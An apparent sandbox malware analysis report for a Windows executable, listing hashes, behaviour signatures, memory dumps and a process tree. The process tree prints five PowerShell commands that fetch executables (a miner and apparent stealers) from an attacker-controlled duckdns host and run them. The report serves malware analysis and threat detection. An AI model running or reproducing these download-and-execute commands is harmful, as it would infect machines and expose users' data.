2935daeddeb1f505cea4ad368f598ab029942d91d831b71bbe4de5284c7a3132

Analysis

max time kernel
120s
max time network
123s
platform
windows7_x64
resource
win7-20240319-en
resource tags

arch:x64arch:x86image:win7-20240319-enlocale:en-usos:windows7-x64system
submitted
28/03/2024, 09:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe
Size

451KB
MD5

6614077c77a8182f0307a720071f2197
SHA1

06a06a6d02ad281942ed8b6890f099be54275bb2
SHA256

2935daeddeb1f505cea4ad368f598ab029942d91d831b71bbe4de5284c7a3132
SHA512

26b1249631b8762d332b04ccac12faf4e52a4641efa90ff0c13596715c5ef8f4eb08c4e6e32efe551ebf3a3a432a897c33eafa9980dd12eeb65213081f3d77cb
SSDEEP

12288:QLMEalqxXblqoRX5qbfphLxaO3qX+t4SJ:cqaXNabfphLxa4w4

Score

3^/10

Malware Config

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
2512	powershell.exe
2548	powershell.exe
2460	powershell.exe
2464	powershell.exe
436	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	2512	powershell.exe
Token: SeDebugPrivilege	2548	powershell.exe
Token: SeDebugPrivilege	2460	powershell.exe
Token: SeDebugPrivilege	2464	powershell.exe
Token: SeDebugPrivilege	436	powershell.exe

Suspicious use of WriteProcessMemory 21 IoCs

description	pid	Process	procid_target
PID 2184 wrote to memory of 2216	2184	SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe	28
PID 2184 wrote to memory of 2216	2184	SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe	28
PID 2184 wrote to memory of 2216	2184	SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe	28
PID 2216 wrote to memory of 1744	2216	WScript.exe	29
PID 2216 wrote to memory of 1744	2216	WScript.exe	29
PID 2216 wrote to memory of 1744	2216	WScript.exe	29
PID 1744 wrote to memory of 2512	1744	cmd.exe	31
PID 1744 wrote to memory of 2512	1744	cmd.exe	31
PID 1744 wrote to memory of 2512	1744	cmd.exe	31
PID 1744 wrote to memory of 2548	1744	cmd.exe	32
PID 1744 wrote to memory of 2548	1744	cmd.exe	32
PID 1744 wrote to memory of 2548	1744	cmd.exe	32
PID 1744 wrote to memory of 2460	1744	cmd.exe	33
PID 1744 wrote to memory of 2460	1744	cmd.exe	33
PID 1744 wrote to memory of 2460	1744	cmd.exe	33
PID 1744 wrote to memory of 2464	1744	cmd.exe	34
PID 1744 wrote to memory of 2464	1744	cmd.exe	34
PID 1744 wrote to memory of 2464	1744	cmd.exe	34
PID 1744 wrote to memory of 436	1744	cmd.exe	35
PID 1744 wrote to memory of 436	1744	cmd.exe	35
PID 1744 wrote to memory of 436	1744	cmd.exe	35

C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe
"C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2184
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\down.vbs"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2216
- - C:\Windows\System32\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\down.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1744
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://puredgb.duckdns.org:30000/ejr9e45s/xmr.exe' -OutFile 'C:\Users\Admin\AppData\Roaming\6.exe'; C:\Users\Admin\AppData\Roaming\6.exe"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2512
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://puredgb.duckdns.org:30000/hyar8z46/discord.exe' -OutFile 'C:\Users\Admin\AppData\Roaming\1.exe'; C:\Users\Admin\AppData\Roaming\1.exe"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2548
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://puredgb.duckdns.org:30000/gn1jv6sz/xeno.exe' -OutFile 'C:\Users\Admin\AppData\Roaming\2.exe'; C:\Users\Admin\AppData\Roaming\2.exe"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2460
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://puredgb.duckdns.org:30000/6nif5f8r/address.exe' -OutFile 'C:\Users\Admin\AppData\Roaming\5.exe'; C:\Users\Admin\AppData\Roaming\5.exe"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2464
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://puredgb.duckdns.org:30000/g0nv8z1z/creal.exe' -OutFile 'C:\Users\Admin\AppData\Roaming\4.exe'; C:\Users\Admin\AppData\Roaming\4.exe"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:436

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\down.bat

Filesize
1KB

MD5
48d0fbe997f37f768ab67afa935f4db8

SHA1
21bd27b35e0edd6e4a02c5d3e19ba3e1388e36c5

SHA256
bff2534d8b88513358894215ac244520d70b226e463d3035c4ca39892dacfff7

SHA512
286e7190ee8840f54977f78e101087a8d73682b665fee75bdb68d8e3f51ee0b6ace28a69f52953c36951e979bb9b9299d7341d415165141202738bc7b8eb341d

Download Submit
C:\Users\Admin\AppData\Local\Temp\down.vbs

Filesize
121B

MD5
f320a0b986e09c248827af4ee48e23b9

SHA1
083fd1f18057e1077d5a88f54e190e95c910918f

SHA256
ab93c1042a9eca743335a1dc9192e3df891960b00d243278f18c3b8beff0555f

SHA512
33150cbb8734eb6f37dec03ca573766d5f0324774bce9f28d259c180f1a26ede32dc11a1d8378473ac32a297e8770456a27b942d860003c0f316fc7ecc58eae3

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
f67c0e8062105197a16d057247185262

SHA1
cb774ec018dc8c1c06b27e57292424af52edbc21

SHA256
db9e1abcd3027ca4d32219ab60eb72fd4548eef1e6bdfbfc48c5cc83795b4e1a

SHA512
e8a7ff3ecf2904d749ce873ccfc8d4a1f31e33ed2a0a426f0dc78501f75d6c8ba3fe45b1716089e3e2baee3bb37dcdf571c5016136ed0d8c9ad8fa23202ebc3a

Download Submit
memory/436-64-0x000007FEF5B60000-0x000007FEF64FD000-memory.dmp

Filesize
9.6MB

Download
memory/436-70-0x000007FEF5B60000-0x000007FEF64FD000-memory.dmp

Filesize
9.6MB

Download
memory/436-66-0x0000000002680000-0x0000000002700000-memory.dmp

Filesize
512KB

Download
memory/436-65-0x0000000002680000-0x0000000002700000-memory.dmp

Filesize
512KB

Download
memory/436-67-0x0000000002680000-0x0000000002700000-memory.dmp

Filesize
512KB

Download
memory/436-68-0x000007FEF5B60000-0x000007FEF64FD000-memory.dmp

Filesize
9.6MB

Download
memory/436-69-0x0000000002680000-0x0000000002700000-memory.dmp

Filesize
512KB

Download
memory/2460-39-0x000007FEF5B60000-0x000007FEF64FD000-memory.dmp

Filesize
9.6MB

Download
memory/2460-45-0x000007FEF5B60000-0x000007FEF64FD000-memory.dmp

Filesize
9.6MB

Download
memory/2460-44-0x00000000025F0000-0x0000000002670000-memory.dmp

Filesize
512KB

Download
memory/2460-43-0x000007FEF5B60000-0x000007FEF64FD000-memory.dmp

Filesize
9.6MB

Download
memory/2460-42-0x00000000025F0000-0x0000000002670000-memory.dmp

Filesize
512KB

Download
memory/2460-41-0x00000000025F0000-0x0000000002670000-memory.dmp

Filesize
512KB

Download
memory/2460-40-0x00000000025F0000-0x0000000002670000-memory.dmp

Filesize
512KB

Download
memory/2464-54-0x000007FEF51C0000-0x000007FEF5B5D000-memory.dmp

Filesize
9.6MB

Download
memory/2464-58-0x000007FEF51C0000-0x000007FEF5B5D000-memory.dmp

Filesize
9.6MB

Download
memory/2464-57-0x0000000002980000-0x0000000002A00000-memory.dmp

Filesize
512KB

Download
memory/2464-56-0x0000000002980000-0x0000000002A00000-memory.dmp

Filesize
512KB

Download
memory/2464-55-0x0000000002980000-0x0000000002A00000-memory.dmp

Filesize
512KB

Download
memory/2464-52-0x000007FEF51C0000-0x000007FEF5B5D000-memory.dmp

Filesize
9.6MB

Download
memory/2464-53-0x0000000002980000-0x0000000002A00000-memory.dmp

Filesize
512KB

Download
memory/2512-18-0x00000000028E0000-0x0000000002960000-memory.dmp

Filesize
512KB

Download
memory/2512-12-0x000000001B2F0000-0x000000001B5D2000-memory.dmp

Filesize
2.9MB

Download
memory/2512-20-0x000007FEF5B60000-0x000007FEF64FD000-memory.dmp

Filesize
9.6MB

Download
memory/2512-13-0x0000000001D70000-0x0000000001D78000-memory.dmp

Filesize
32KB

Download
memory/2512-14-0x000007FEF5B60000-0x000007FEF64FD000-memory.dmp

Filesize
9.6MB

Download
memory/2512-19-0x00000000028E0000-0x0000000002960000-memory.dmp

Filesize
512KB

Download
memory/2512-15-0x00000000028E0000-0x0000000002960000-memory.dmp

Filesize
512KB

Download
memory/2512-16-0x000007FEF5B60000-0x000007FEF64FD000-memory.dmp

Filesize
9.6MB

Download
memory/2512-17-0x00000000028E0000-0x0000000002960000-memory.dmp

Filesize
512KB

Download
memory/2548-27-0x000007FEF51C0000-0x000007FEF5B5D000-memory.dmp

Filesize
9.6MB

Download
memory/2548-33-0x000007FEF51C0000-0x000007FEF5B5D000-memory.dmp

Filesize
9.6MB

Download
memory/2548-32-0x00000000029F0000-0x0000000002A70000-memory.dmp

Filesize
512KB

Download
memory/2548-31-0x00000000029F0000-0x0000000002A70000-memory.dmp

Filesize
512KB

Download
memory/2548-30-0x000007FEF51C0000-0x000007FEF5B5D000-memory.dmp

Filesize
9.6MB

Download
memory/2548-28-0x0000000002420000-0x0000000002428000-memory.dmp

Filesize
32KB

Download
memory/2548-29-0x00000000029F0000-0x0000000002A70000-memory.dmp

Filesize
512KB

Download
memory/2548-26-0x000000001B290000-0x000000001B572000-memory.dmp

Filesize
2.9MB

Download